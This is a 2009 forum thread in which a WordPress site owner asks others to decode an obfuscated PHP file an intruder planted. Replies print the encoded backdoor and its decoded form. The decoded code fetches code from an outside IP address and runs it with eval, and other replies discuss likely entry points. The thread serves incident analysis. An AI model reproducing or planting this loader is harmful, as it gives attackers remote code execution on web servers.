Translate this hackers code

Discussion in 'PHP' started by adacprogramming, Jun 9, 2009.

0
  1. #1
    A hacker managed to get a page added onto the root of one of my wordpress sites (not sure how yet)

    He added a page called grass.php when you put a parameter in the url
    grass.php?p=9-6559 it seems to call up a page from another site and display it on my site under that URL

    This is the code. It appears to be compressed. Can anyone uncompress this code so I can see what he is doing and the site he is getting his info from?
    {eval(gzinflate(base64_decode('fY9dq4JAEIb/yiJyNJDVvk+FRMQWwUljXbuJWGwdcMFWyS3q358tu/Zqvp73nRlbFChE4n4ruVRSu73FJ29AV7V2bVF4aJ3Sv/jAuAkesgqt67nvT39xP5jhwRAPRoGfv9RdybG/rEML65u8ujbfEnZyaufcw9ZPo0zf+IISVQ5mmBB6JPTktJFHqz0xZMfyQ5wwDwUdBCUspRGjqyjZEOqhfgfLdnsSp8ZwYhztPNNZ+GHhCeJNfqWirBpoa3hkpXvJGpiMeA7tF2+duRmeUi/+AQ==')));}?>
     
    adacprogramming, Jun 9, 2009 IP
  2. jestep

    jestep Prominent Member

    Messages:
    3,659
    Likes Received:
    215
    Best Answers:
    19
    Trophy Points:
    330
    #2 
    
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://78.109.23.240/dynuni5/?p=".trim($_GET['p'])."&sn=".urlencode($_SERVER['SERVER_NAME']));
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 60);

$data=curl_exec($ch);
curl_close($ch);
eval(base64_decode($data));
exit;
    PHP:
    Note sure what this returns, but the eval could allow it to execute just about any php command.
     
    jestep, Jun 9, 2009 IP
    adacprogramming likes this.
  3. jestep

    jestep Prominent Member

    Messages:
    3,659
    Likes Received:
    215
    Best Answers:
    19
    Trophy Points:
    330
    #3
    If you want to be able to figure these out, just follow all the steps except and eval function.

    
<?php 

$string = gzinflate(base64_decode('fY9dq4JAEIb/yiJyNJDVvk+FRMQWwUljXbuJWGwdcMFWyS3q358tu/Zqvp73nRlbFChE4n4ruVRSu73FJ29AV7V2bVF4aJ3Sv/jAuAkesgqt67nvT39xP5jhwRAPRoGfv9RdybG/rEML65u8ujbfEnZyaufcw9ZPo0zf+IISVQ5mmBB6JPTktJFHqz0xZMfyQ5wwDwUdBCUspRGjqyjZEOqhfgfLdnsSp8ZwYhztPNNZ+GHhCeJNfqWirBpoa3hkpXvJGpiMeA7tF2+duRmeUi/+AQ=='));

?>

<textarea><?php echo $string; ?></textarea>
    PHP:
     
    jestep, Jun 9, 2009 IP
  4. Vooler

    Vooler Well-Known Member

    Messages:
    1,146
    Likes Received:
    64
    Best Answers:
    4
    Trophy Points:
    150
    #4
    Very simple. replace evaluation with print and jobs done, here is hte code

    $ch = curl_init();curl_setopt($ch, CURLOPT_URL, "http://78.109.23.240/dynuni5/?p=".trim($_GET['p'])."&sn=".urlencode($_SERVER['SERVER_NAME']));curl_setopt($ch, CURLOPT_POST, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 60);$data=curl_exec($ch);curl_close($ch);eval(base64_decode($data));exit;


    I hope it helps you solve the issue. Besides show me your site and user input pages, I may look into. Your script might have some security holes.
     
    Vooler, Jun 9, 2009 IP
    adacprogramming likes this.
  5. adacprogramming

    adacprogramming Well-Known Member

    Messages:
    1,615
    Likes Received:
    62
    Best Answers:
    0
    Trophy Points:
    125
    #5
    Yes that helps thanks

    I'm just using wordpress on www.thedigitaldomain.com

    This is a windows server not a linux server. I'm wondering if a loophole was caused by php on a windows server. This is the only site I have ever done that on, I've never had any problem with this version of wordpress on linux servers
     
    adacprogramming, Jun 9, 2009 IP
  6. jestep

    jestep Prominent Member

    Messages:
    3,659
    Likes Received:
    215
    Best Answers:
    19
    Trophy Points:
    330
    #6
    It's hard to say how that got there. I would check for things like anonymous ftp, or directories/scripts with full permissions that aren't escaping user input.

    It takes a fairly big hole to put a script like this on a site. Very unlikely it was xss. Was this pulled from a database, or did you find it hard coded? Also, many times plugin creators put these in their plugins to track or put a link to their site on a blog. Was this in a specific plugin?
     
    jestep, Jun 9, 2009 IP
  7. adacprogramming

    adacprogramming Well-Known Member

    Messages:
    1,615
    Likes Received:
    62
    Best Answers:
    0
    Trophy Points:
    125
    #7
    Scary part was this was an actual page on the root of this domain, Not just something in the database. or in the plugin folder
     
    adacprogramming, Jun 9, 2009 IP
  8. adacprogramming

    adacprogramming Well-Known Member

    Messages:
    1,615
    Likes Received:
    62
    Best Answers:
    0
    Trophy Points:
    125
    #8
    googleing grass.php?p=9-6559 comes up with other sites that must have been hacked into at one time
     
    adacprogramming, Jun 9, 2009 IP
  9. Vooler

    Vooler Well-Known Member

    Messages:
    1,146
    Likes Received:
    64
    Best Answers:
    4
    Trophy Points:
    150
    #9
    grass.php seems to be the culprit then. Where does this file reside ? within root of the wordpress blog?
    I never touched wordpress but as per the hacker's code s/he has injected code someway through querystirng.

    Second good guess may be uploading feature enabled in your blog where script might be recognizing image uploads using getiamgesize and fake files have been uploaded with GIF98a signature and rest of php code. Once a user is able to upload such thing and can get to uploaded path, s/he gets hold of everything.

    See if there was some patch for worpress was released in near dates, and/or you might not have updated wordpress since long.

    All of this is just a good guess.

    regards
     
    Vooler, Jun 9, 2009 IP
  10. sssharlasss

    sssharlasss Peon

    Messages:
    17
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #10
    I had something like that happen to one of my sites once. I read into it and found out that some Chinese hacking gang was the culprit. Weird, huh? I think it was a hole in my version of WordPress.
     
    sssharlasss, Jun 9, 2009 IP
    adacprogramming likes this.
  11. Gallabanga

    Gallabanga Peon

    Messages:
    567
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    0
    #11
    Decodes to:

    }�]��@���"r4�վO�D��Ic]��Xlp�V�-�ߟ-��j����[(D�~+�TR���'o@W�vmQxh�ҿ��� �
    ���Oq?���F����]ɱ��C 뛼�6�vrj����O�L���Uf�z$�䴑G�=1d��C�0%,���(��~�v{��pb�<�Y�a� �M~���hkxd�{���x�o���R/�
     
    Gallabanga, Jun 9, 2009 IP
  12. Gallabanga

    Gallabanga Peon

    Messages:
    567
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    0
    #12
    Most likely doesn't help :p
     
    Gallabanga, Jun 9, 2009 IP
  13. adacprogramming

    adacprogramming Well-Known Member

    Messages:
    1,615
    Likes Received:
    62
    Best Answers:
    0
    Trophy Points:
    125
    #13
    Seems like the best guess is a hole in my wordpress script. I'll move up to the latest version later today.

    Thanks for everyones input.
     
    adacprogramming, Jun 10, 2009 IP